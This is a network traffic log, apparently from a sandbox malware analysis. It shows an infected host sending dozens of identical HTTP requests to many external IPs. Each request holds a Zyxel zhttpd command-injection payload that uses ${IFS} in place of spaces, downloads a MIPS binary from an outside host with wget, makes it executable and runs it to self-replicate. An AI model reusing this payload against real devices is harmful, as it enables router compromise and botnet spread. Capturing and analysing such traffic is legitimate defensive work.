                                          Jan 14, 2024 15:46:32.351751089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8237192.168.2.233426674.46.154.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351752996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8238192.168.2.2336930113.250.98.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351782084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8239192.168.2.2335076204.62.155.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351810932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8240192.168.2.233532249.157.244.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351829052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8241192.168.2.2335830107.37.53.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351845026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8242192.168.2.233784454.147.161.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351875067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8243192.168.2.233508020.176.168.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351942062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8244192.168.2.2342344169.189.152.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351962090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8245192.168.2.233710296.82.195.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351972103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8246192.168.2.2354282152.157.74.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.351994991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8247192.168.2.235688648.79.122.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352040052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8248192.168.2.234911694.145.187.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352092981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8249192.168.2.236012641.40.161.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352121115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8250192.168.2.233910478.200.180.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352144957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8251192.168.2.233448290.65.50.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352176905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8252192.168.2.2359048108.91.188.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352221966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8253192.168.2.2336744128.93.180.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352231979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8254192.168.2.23384709.246.246.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352248907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8255192.168.2.2343404193.174.228.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352269888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8256192.168.2.2345356194.252.9.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352277994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8257192.168.2.233559098.250.78.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352278948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8258192.168.2.2340838128.228.49.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352344036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8259192.168.2.2337030190.98.87.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352350950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8260192.168.2.235203087.151.225.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352371931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8261192.168.2.2340906120.219.170.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352375984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8262192.168.2.2340092174.208.87.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352433920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8263192.168.2.2355082207.222.119.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352456093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8264192.168.2.235676878.167.238.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352485895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8265192.168.2.23405648.164.61.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352523088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8266192.168.2.23333169.185.93.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352576971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8267192.168.2.2350368182.24.95.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352585077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8268192.168.2.235937866.169.36.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352602959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8269192.168.2.233777212.78.5.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352644920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8270192.168.2.235147679.66.141.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352674961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8271192.168.2.2358070135.141.210.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352696896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8272192.168.2.2336992140.196.21.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352741957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8273192.168.2.233807438.179.134.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352775097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8274192.168.2.2338734179.77.143.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352782011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8275192.168.2.2352818100.247.26.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352808952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8276192.168.2.23455322.56.205.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352819920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8277192.168.2.2338620203.104.196.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352881908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8278192.168.2.2351954195.123.49.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352890015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8279192.168.2.2351490200.232.19.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352907896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8280192.168.2.235518460.22.231.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352938890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8281192.168.2.2352128165.153.99.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352958918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8282192.168.2.233766675.70.252.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352967024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8283192.168.2.235125025.77.70.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.352997065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8284192.168.2.2338436110.44.213.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353064060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8285192.168.2.2336182177.97.162.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353080034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8286192.168.2.2336068190.60.225.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353097916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8287192.168.2.235469285.133.71.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353147984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8288192.168.2.233777017.125.165.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353152990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8289192.168.2.2353626166.171.179.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353172064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8290192.168.2.235603485.194.230.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353210926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8291192.168.2.235916859.47.150.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353234053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8292192.168.2.2339456104.102.225.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353281975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8293192.168.2.233763089.220.69.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353293896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8294192.168.2.233808246.224.132.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353308916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8295192.168.2.2346350103.157.52.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353352070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8296192.168.2.234124897.29.166.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353384972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8297192.168.2.2333080172.153.195.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353406906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8298192.168.2.2336884121.215.212.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.353406906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8299192.168.2.2339556125.87.217.150443
                                          TimestampBytes transferredDirectionData
